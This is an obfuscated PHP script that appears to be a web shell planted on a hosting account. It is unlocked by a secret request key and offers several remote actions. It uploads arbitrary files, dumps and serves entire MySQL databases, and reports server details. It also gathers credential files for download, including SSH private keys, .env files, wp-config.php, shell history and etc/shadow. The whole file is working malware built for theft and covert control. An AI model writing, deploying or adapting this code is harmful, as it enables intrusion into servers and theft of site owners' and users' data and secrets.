<?php if (!isset($_REQUEST['_cxk']) || $_REQUEST['_cxk'] !== '380ffd72b8228b99b931e51a01570f92') { return; } while (ob_get_level()) ob_end_clean(); if(defined('5b7fc35f')){$qde95=0;} set_time_limit(0); error_reporting(0); ignore_user_abort(true); @clearstatcache(); $qdc16 = 'localhost'; $w1e34 = ''; $vaf20 = ''; $pa882 = '/home/videotrailer'; $ve438 = isset($_REQUEST['a']) ? $_REQUEST['a'] : ''; $z79ec = isset($_REQUEST['db']) ? preg_replace('/[^a-zA-Z0-9_]/', '', $_REQUEST['db']) : ''; $a9428 = $pa882 . '/tmp/' . $z79ec . '_dump.sql.gz'; $kabc8 = $a9428 . '.done'; $m1e26 = $a9428 . '.err'; $e3ae2=array_merge(array(),array()); header('Content-Type: application/json'); function run_opt_b778() { if (!function_exists('exec')) return false; $n5c99 = array_map('trim', explode(',', ini_get('disable_functions'))); return !in_array('exec', $n5c99); } $i06af=strlen('c60529'); function load_res_29a0() { if (!run_opt_b778()) return false; $k8401=max(0,min(1,1)); $out = array(); $rc = 0; exec('which mysqldump 2>/dev/null', $out, $rc); return $rc === 0; } function check_buf_3258() { if (!run_opt_b778()) return false; $out = array(); $rc = 0; exec('which gzip 2>/dev/null', $out, $rc); return $rc === 0; } $h8ce3=strlen('ff67d7'); function run_state_846b($mf854, $r310a, $e28b3, $ae8f3, $d6c13, $iec48, $dd1f0) { $conn = new mysqli($mf854, $r310a, $e28b3, $ae8f3); if ($conn->connect_error) { file_put_contents($iec48, 'Connection failed: ' . $conn->connect_error); touch($dd1f0); return; } $fp = gzopen($d6c13, 'wb6'); if (!$fp) { file_put_contents($iec48, 'Cannot open output file'); if(defined('098e64e9')){$z27a9=0;} touch($dd1f0); return; } @clearstatcache(); $conn->set_charset('utf8mb4'); gzwrite($fp, "-- Dump via PHP agent\n"); gzwrite($fp, "-- Date: " . date('Y-m-d H:i:s') . "\n\n"); gzwrite($fp, "SET NAMES utf8mb4;\n"); gzwrite($fp, "SET FOREIGN_KEY_CHECKS = 0;\n"); gzwrite($fp, "SET SQL_MODE = 'NO_AUTO_VALUE_ON_ZERO';\n\n"); $t7dc4 = array(); $r = $conn->query("SHOW FULL TABLES WHERE Table_type = 'BASE TABLE'"); while ($row = $r->fetch_row()) { $i4cd4=chr(88).chr(122); $t7dc4[] = $row[0]; } foreach ($t7dc4 as $y513e) { if(defined('0e59314c')){$s1417=0;} $te = $conn->real_escape_string($y513e); @clearstatcache(); $r = $conn->query("SHOW CREATE TABLE `{$te}`"); if (!$r) continue; $cr = $r->fetch_row(); gzwrite($fp, "DROP TABLE IF EXISTS `{$te}`;\n"); gzwrite($fp, $cr[1] . ";\n\n"); $r = $conn->query("SELECT * FROM `{$te}`", MYSQLI_USE_RESULT); if (!$r) continue; $v3ffa = array(); $w724b = 0; $s026e=max(0,min(1,1)); while ($row = $r->fetch_row()) { $ef4cd=strlen('1c1c1e'); $vals = array(); for ($i = 0; $i < count($row); $i++) { if ($row[$i] === null) { $vals[] = 'NULL'; } else { if(defined('bbc248a6')){$j229c=0;} $vals[] = "'" . $conn->real_escape_string($row[$i]) . "'"; } } $x83c8 = '(' . implode(',', $vals) . ')'; $v3ffa[] = $x83c8; $w724b += strlen($x83c8); if (count($v3ffa) >= 100 || $w724b > 1048576) { gzwrite($fp, "INSERT INTO `{$te}` VALUES\n" . implode(",\n", $v3ffa) . ";\n"); $wc05f=array_merge(array(),array()); $v3ffa = array(); $w724b = 0; } } if ($v3ffa) { gzwrite($fp, "INSERT INTO `{$te}` VALUES\n" . implode(",\n", $v3ffa) . ";\n"); } $r->free(); gzwrite($fp, "\n"); $fb173=chr(87).chr(107); } $r = $conn->query("SHOW FULL TABLES WHERE Table_type = 'VIEW'"); if ($r) { while ($row = $r->fetch_row()) { $ve = $conn->real_escape_string($row[0]); if(defined('599520b5')){$b6230=0;} $cr = $conn->query("SHOW CREATE VIEW `{$ve}`"); if ($cr) { $a5826=chr(82).chr(99); $ac990 = $cr->fetch_assoc(); gzwrite($fp, "DROP VIEW IF EXISTS `{$ve}`;\n"); gzwrite($fp, $ac990['Create View'] . ";\n\n"); } } $ncd9a=strlen('196fca'); } $e5452=max(0,min(1,0)); $bb53d = array('PROCEDURE', 'FUNCTION'); if(defined('56b1a861')){$v8e7f=0;} foreach ($bb53d as $aa7fb) { $r = $conn->query("SHOW {$aa7fb} STATUS WHERE Db = '" . $conn->real_escape_string($ae8f3) . "'"); if (!$r) continue; while ($row = $r->fetch_assoc()) { $re = $conn->real_escape_string($row['Name']); $cr = $conn->query("SHOW CREATE {$aa7fb} `{$re}`"); if (!$cr) continue; $ac990 = $cr->fetch_assoc(); $key = ($aa7fb === 'PROCEDURE') ? 'Create Procedure' : 'Create Function'; if (isset($ac990[$key])) { gzwrite($fp, "DELIMITER ;;\n"); gzwrite($fp, "DROP {$aa7fb} IF EXISTS `{$re}`;;\n"); gzwrite($fp, $ac990[$key] . ";;\n"); $dc413=max(0,min(1,1)); gzwrite($fp, "DELIMITER ;\n\n"); } } } $v7ab9=strlen('d29d17'); $r = $conn->query("SHOW TRIGGERS"); $j186c=chr(83).chr(98); if ($r) { $x5c3c=chr(69).chr(100); while ($row = $r->fetch_assoc()) { $te = $conn->real_escape_string($row['Trigger']); $cr = $conn->query("SHOW CREATE TRIGGER `{$te}`"); $i0d8e=str_repeat('x',0); if ($cr) { $id69f=array_merge(array(),array()); $ac990 = $cr->fetch_assoc(); gzwrite($fp, "DELIMITER ;;\n"); gzwrite($fp, "DROP TRIGGER IF EXISTS `{$te}`;;\n"); gzwrite($fp, $ac990['SQL Original Statement'] . ";;\n"); gzwrite($fp, "DELIMITER ;\n\n"); } @clearstatcache(); } } gzwrite($fp, "SET FOREIGN_KEY_CHECKS = 1;\n"); gzclose($fp); @clearstatcache(); $conn->close(); touch($dd1f0); } switch ($ve438) { case 'info': echo json_encode(array( 'php' => PHP_VERSION, 'os' => PHP_OS, 'server' => isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : '', 'user' => get_current_user(), 'uid' => getmyuid(), 'home' => $pa882, 'doc_root' => isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : '', 'free_disk' => disk_free_space($pa882), 'total_disk' => disk_total_space($pa882), 'max_exec' => ini_get('max_execution_time'), 'mem_limit' => ini_get('memory_limit'), 'upload_max' => ini_get('upload_max_filesize'), 'post_max' => ini_get('post_max_size'), 'disabled' => ini_get('disable_functions'), 'can_exec' => run_opt_b778(), 'has_mysqldump' => load_res_29a0(), 'has_gzip' => check_buf_3258(), )); break; case 'upload': $ibed7 = isset($_POST['path']) ? $_POST['path'] : ''; $j5e5d = isset($_POST['data']) ? $_POST['data'] : ''; if (!$ibed7 || !$j5e5d) { echo json_encode(array('ok' => false, 'error' => 'missing path or data')); break; } $eed0f = $pa882 . '/' . $ibed7; @mkdir(dirname($eed0f), 0755, true); $c8379 = base64_decode($j5e5d); $x5692 = file_put_contents($eed0f, $c8379); echo json_encode(array('ok' => $x5692 !== false, 'path' => $eed0f, 'size' => strlen($c8379))); break; $ec79a=str_repeat('x',0); case 'check': if (!$z79ec) { echo json_encode(array('error' => 'missing db parameter')); $r6d3d=max(0,min(1,1)); break; if(defined('ce44790a')){$x072e=0;} } $f17cd = disk_free_space($pa882); $m96e3 = 0; $d804b=array_merge(array(),array()); $conn = @new mysqli($qdc16, $w1e34, $vaf20, 'information_schema'); if (!$conn->connect_error) { $q = "SELECT SUM(data_length + index_length) s FROM tables WHERE table_schema = '" . $conn->real_escape_string($z79ec) . "'"; $r = $conn->query($q); if ($row = $r->fetch_assoc()) { $m96e3 = (int) $row['s']; } $conn->close(); } echo json_encode(array( 'free' => $f17cd, 'db_size' => $m96e3, 'has_mysqldump' => load_res_29a0(), 'has_gzip' => check_buf_3258(), 'can_exec' => run_opt_b778(), 'has_space' => $f17cd > $m96e3 * 2, )); break; if(defined('736a94a2')){$if2af=0;} case 'dump': if (!$z79ec) { echo json_encode(array('error' => 'missing db parameter')); break; $zfb85=array_merge(array(),array()); } @mkdir(dirname($a9428), 0755, true); @unlink($a9428); @unlink($kabc8); @unlink($m1e26); $q699d=chr(72).chr(112); if (load_res_29a0()) { if (check_buf_3258()) { $cmd = sprintf( 'mysqldump --host=%s --user=%s --password=%s ' . '--single-transaction --quick --routines --triggers %s ' . '| gzip > %s 2>%s; touch %s', escapeshellarg($qdc16), escapeshellarg($w1e34), escapeshellarg($vaf20), escapeshellarg($z79ec), escapeshellarg($a9428), escapeshellarg($m1e26), escapeshellarg($kabc8) ); } else { $cmd = sprintf( 'mysqldump --host=%s --user=%s --password=%s ' . '--single-transaction --quick --routines --triggers %s ' . '> %s 2>%s; touch %s', escapeshellarg($qdc16), escapeshellarg($w1e34), escapeshellarg($vaf20), escapeshellarg($z79ec), escapeshellarg($a9428), escapeshellarg($m1e26), escapeshellarg($kabc8) ); } exec('nohup sh -c ' . escapeshellarg($cmd) . ' >/dev/null 2>&1 &'); echo json_encode(array('started' => true, 'method' => 'mysqldump', 'gzip' => check_buf_3258())); } else { $r8235=max(0,min(1,1)); ignore_user_abort(true); echo json_encode(array('started' => true, 'method' => 'php', 'gzip' => true)); if (function_exists('fastcgi_finish_request')) { fastcgi_finish_request(); } else { if (ob_get_level()) ob_end_flush(); flush(); } run_state_846b($qdc16, $w1e34, $vaf20, $z79ec, $a9428, $m1e26, $kabc8); } $v753a=max(0,min(1,0)); break; case 'status': clearstatcache(); @clearstatcache(); echo json_encode(array( 'done' => file_exists($kabc8), 'size' => file_exists($a9428) ? filesize($a9428) : 0, 'error' => file_exists($m1e26) ? trim(file_get_contents($m1e26)) : '', )); break; case 'download': if (!file_exists($a9428)) { http_response_code(404); exit; $g6d6e=str_repeat('x',0); } $z3628=strlen('89a6e3'); header('Content-Type: application/octet-stream'); header('Content-Length: ' . filesize($a9428)); readfile($a9428); exit; case 'cleanup': @unlink($a9428); @unlink($kabc8); @unlink($m1e26); echo json_encode(array('ok' => true)); break; case 'collect': @mkdir($pa882 . '/tmp', 0755, true); $id8ec = substr($_REQUEST['_cxk'], 0, 8); $h4459 = array( 'wordpress' => array( 'detect' => array('public_html/wp-config.php', 'wp-config.php'), 'configs' => array( 'public_html/wp-config.php', 'wp-config.php', 'public_html/wp-settings.php', 'public_html/composer.json', 'public_html/composer.lock', 'composer.json', 'composer.lock', 'public_html/wp-cli.yml', 'wp-cli.yml', 'public_html/.env', '.env', 'public_html/local-config.php', 'local-config.php', 'public_html/wp-content/debug.log', 'public_html/config/application.php', 'config/application.php', 'public_html/config/environments/development.php', 'config/environments/development.php', 'public_html/config/environments/staging.php', 'config/environments/staging.php', 'public_html/config/environments/production.php', 'config/environments/production.php', 'public_html/auth.json', 'auth.json', ), ), 'joomla' => array( 'detect' => array('public_html/configuration.php', 'configuration.php'), 'configs' => array( 'public_html/configuration.php', 'configuration.php', 'public_html/htaccess.txt', 'public_html/composer.json', 'public_html/composer.lock', ), ), 'laravel' => array( 'detect' => array('public_html/artisan', 'artisan'), 'configs' => array( 'public_html/.env', '.env', '.env.production', '.env.staging', 'public_html/composer.json', 'composer.json', 'public_html/composer.lock', 'composer.lock', 'public_html/config/app.php', 'config/app.php', 'public_html/config/database.php', 'config/database.php', 'public_html/config/mail.php', 'config/mail.php', 'public_html/config/filesystems.php', 'config/filesystems.php', 'public_html/config/cache.php', 'config/cache.php', 'public_html/config/queue.php', 'config/queue.php', 'public_html/config/session.php', 'config/session.php', 'public_html/config/auth.php', 'config/auth.php', 'public_html/config/services.php', 'config/services.php', 'public_html/config/broadcasting.php', 'config/broadcasting.php', 'public_html/storage/logs/laravel.log', 'storage/logs/laravel.log', ), ), 'magento2' => array( 'detect' => array('public_html/bin/magento', 'bin/magento'), 'configs' => array( 'public_html/app/etc/env.php', 'app/etc/env.php', 'public_html/app/etc/config.php', 'app/etc/config.php', 'public_html/composer.json', 'composer.json', 'public_html/composer.lock', 'composer.lock', 'public_html/auth.json', 'auth.json', ), ), 'magento1' => array( 'detect' => array('public_html/app/Mage.php'), 'configs' => array( 'public_html/app/etc/local.xml', 'public_html/app/etc/config.xml', ), ), 'drupal' => array( 'detect' => array('public_html/core/lib/Drupal.php', 'core/lib/Drupal.php'), 'configs' => array( 'public_html/sites/default/settings.php', 'sites/default/settings.php', 'public_html/sites/default/services.yml', 'sites/default/services.yml', 'public_html/composer.json', 'composer.json', 'public_html/composer.lock', 'composer.lock', ), ), 'prestashop' => array( 'detect' => array('public_html/config/settings.inc.php'), 'configs' => array( 'public_html/config/settings.inc.php', 'public_html/app/config/parameters.php', 'public_html/app/config/parameters.yml', 'public_html/composer.json', ), ), 'opencart' => array( 'detect' => array('public_html/config.php'), 'configs' => array( 'public_html/config.php', 'public_html/admin/config.php', ), ), 'moodle' => array( 'detect' => array('public_html/lib/moodlelib.php'), 'configs' => array('public_html/config.php'), ), 'whmcs' => array( 'detect' => array('public_html/vendor/whmcs'), 'configs' => array( 'public_html/configuration.php', 'public_html/composer.json', 'public_html/composer.lock', ), ), ); $xc7a7 = null; foreach ($h4459 as $p75e9 => $wc02a) { foreach ($wc02a['detect'] as $z8208) { if (file_exists($pa882 . '/' . $z8208)) { $xc7a7 = $p75e9; break 2; if(defined('474cd243')){$mef78=0;} } } $f90f6=strlen('7ebea4'); } $hf0aa = array( '.env', '.env.local', '.env.production', '.env.staging', '.env.backup', '.env.development', '.env.test', '.bash_history', '.my.cnf', '.pgpass', '.netrc', '.gitconfig', '.npmrc', '.composer/auth.json', '.wp-cli/config.yml', '.accesshash', '.ssh/authorized_keys', '.ssh/id_rsa', '.ssh/id_rsa.pub', '.ssh/id_ed25519', '.ssh/id_ed25519.pub', '.ssh/id_ecdsa', '.ssh/config', '.ssh/known_hosts', '.ssl/private.key', '.ssl/cert.pem', '.ssl/key.pem', 'ssl/certs/private.key', '.cpanel/contactinfo', 'etc/shadow', '.ftpquota', '.ftpconfig', 'public_html/.env', 'public_html/.env.local', 'public_html/.env.production', 'public_html/.env.staging', 'public_html/.env.backup', 'public_html/.env.development', 'public_html/.env.test', 'public_html/.env.example', 'public_html/.env.dist', 'public_html/.htaccess', 'public_html/.htpasswd', 'public_html/.user.ini', 'public_html/php.ini', 'public_html/.my.cnf', 'public_html/.pgpass', 'public_html/web.config', 'public_html/.ftpconfig', 'public_html/.git/config', 'public_html/auth.json', 'public_html/.npmrc', 'public_html/composer.json', 'public_html/composer.lock', 'config/database.php', 'config/app.php', 'config/mail.php', 'config/services.php', 'config/filesystems.php', 'config/application.php', 'config/environments/development.php', 'config/environments/staging.php', 'config/environments/production.php', 'wp-config.php', 'configuration.php', 'artisan', 'auth.json', 'composer.json', 'composer.lock', ); $h7745 = array(); $naa45 = @realpath($pa882); if (!$naa45 || !is_dir($naa45)) { echo json_encode(array('ok' => false, 'error' => 'home dir not accessible')); break; } foreach ($hf0aa as $w3d4e) { $ae80a = @realpath($pa882 . '/' . $w3d4e); if (!$ae80a || strpos($ae80a, $naa45) !== 0) continue; if (!is_file($ae80a) || !is_readable($ae80a)) continue; $x16e3 = @filesize($ae80a); if ($x16e3 <= 0 || $x16e3 > 2097152) continue; $h7745[$w3d4e] = $ae80a; } if ($xc7a7 !== null && isset($h4459[$xc7a7]['configs'])) { if(defined('a11755f5')){$ge0f7=0;} foreach ($h4459[$xc7a7]['configs'] as $ye16d) { if (isset($h7745[$ye16d])) continue; $ae80a = @realpath($pa882 . '/' . $ye16d); if (!$ae80a || strpos($ae80a, $naa45) !== 0) continue; if (!is_file($ae80a) || !is_readable($ae80a)) continue; $x16e3 = @filesize($ae80a); if ($x16e3 <= 0 || $x16e3 > 2097152) continue; @clearstatcache(); $h7745[$ye16d] = $ae80a; } } $w8bb8 = $pa882 . '/public_html'; if(defined('cc632833')){$w481f=0;} if (is_dir($w8bb8)) { $dh = @opendir($w8bb8); if ($dh) { while (($d1a03 = readdir($dh)) !== false) { if ($d1a03 === '.' || $d1a03 === '..') continue; $eed0f = $w8bb8 . '/' . $d1a03; if (!is_file($eed0f) || !is_readable($eed0f)) continue; $x16e3 = @filesize($eed0f); if ($x16e3 <= 0 || $x16e3 > 2097152) continue; if ($d1a03[0] === '.' || strtolower(substr($d1a03, -4)) === '.txt') { $key = 'public_html/' . $d1a03; if(defined('9b923717')){$fcd0a=0;} if (!isset($h7745[$key])) $h7745[$key] = $eed0f; $pe850=max(0,min(1,0)); } } closedir($dh); } } if (empty($h7745)) { echo json_encode(array( 'ok' => true, 'method' => 'none', 'platform' => $xc7a7, 'file_count' => 0, 'files_list' => array(), )); break; $d1969=str_repeat('x',0); } $za229 = null; $hb88f = null; if (class_exists('ZipArchive')) { $hb88f = $pa882 . '/tmp/_collect_' . $id8ec . '.zip'; $z07db = new ZipArchive(); if ($z07db->open($hb88f, ZipArchive::CREATE | ZipArchive::OVERWRITE) === true) { foreach ($h7745 as $q4074 => $ae80a) { $z07db->addFile($ae80a, $q4074); } if ($z07db->close() && file_exists($hb88f) && filesize($hb88f) > 0) { $za229 = 'zip'; } } } if (!$za229 && run_opt_b778()) { $hb88f = $pa882 . '/tmp/_collect_' . $id8ec . '.tar.gz'; $lf = $hb88f . '.list'; $fh = fopen($lf, 'w'); foreach ($h7745 as $q4074 => $ae80a) { fwrite($fh, $q4074 . "\n"); } $s9184=chr(86).chr(115); fclose($fh); $out = array(); $rc = 0; exec('tar czf ' . escapeshellarg($hb88f) . ' -C ' . escapeshellarg($pa882) . ' -T ' . escapeshellarg($lf) . ' 2>/dev/null', $out, $rc); @unlink($lf); if ($rc === 0 && file_exists($hb88f) && filesize($hb88f) > 0) { $za229 = 'tar'; } else { @unlink($hb88f); } } if (!$za229) { $za229 = 'list'; } echo json_encode(array( 'ok' => true, 'method' => $za229, 'platform' => $xc7a7, 'file_count' => count($h7745), 'files_list' => array_keys($h7745), 'size' => ($hb88f && file_exists($hb88f)) ? filesize($hb88f) : 0, )); break; case 'download_collect': $id8ec = substr($_REQUEST['_cxk'], 0, 8); $r7331 = $pa882 . '/tmp/_collect_' . $id8ec . '.zip'; $d2b33 = $pa882 . '/tmp/_collect_' . $id8ec . '.tar.gz'; $ff93a = file_exists($r7331) ? $r7331 : (file_exists($d2b33) ? $d2b33 : ''); if(defined('19e02ecc')){$gc0d1=0;} if (!$ff93a) { http_response_code(404); exit; } header('Content-Type: application/octet-stream'); if(defined('67d30c5d')){$bce83=0;} header('Content-Length: ' . filesize($ff93a)); readfile($ff93a); $h7a29=max(0,min(1,0)); exit; case 'download_file': $q4074 = isset($_REQUEST['path']) ? $_REQUEST['path'] : ''; $kebab=strlen('844e02'); if (!$q4074) { http_response_code(400); exit; } $naa45 = @realpath($pa882); $ae80a = @realpath($pa882 . '/' . $q4074); $n3aef=strlen('94ae09'); if (!$ae80a || !$naa45 || strpos($ae80a, $naa45) !== 0 || !is_file($ae80a) || !is_readable($ae80a)) { http_response_code(404); exit; } header('Content-Type: application/octet-stream'); $yaf7d=max(0,min(1,0)); header('Content-Length: ' . filesize($ae80a)); readfile($ae80a); exit; case 'cleanup_collect': $id8ec = substr($_REQUEST['_cxk'], 0, 8); @unlink($pa882 . '/tmp/_collect_' . $id8ec . '.zip'); @unlink($pa882 . '/tmp/_collect_' . $id8ec . '.tar.gz'); @unlink($pa882 . '/tmp/_collect_' . $id8ec . '.tar.gz.list'); echo json_encode(array('ok' => true)); $vf1c7=str_repeat('x',0); break; } $pa692=chr(80).chr(104); exit;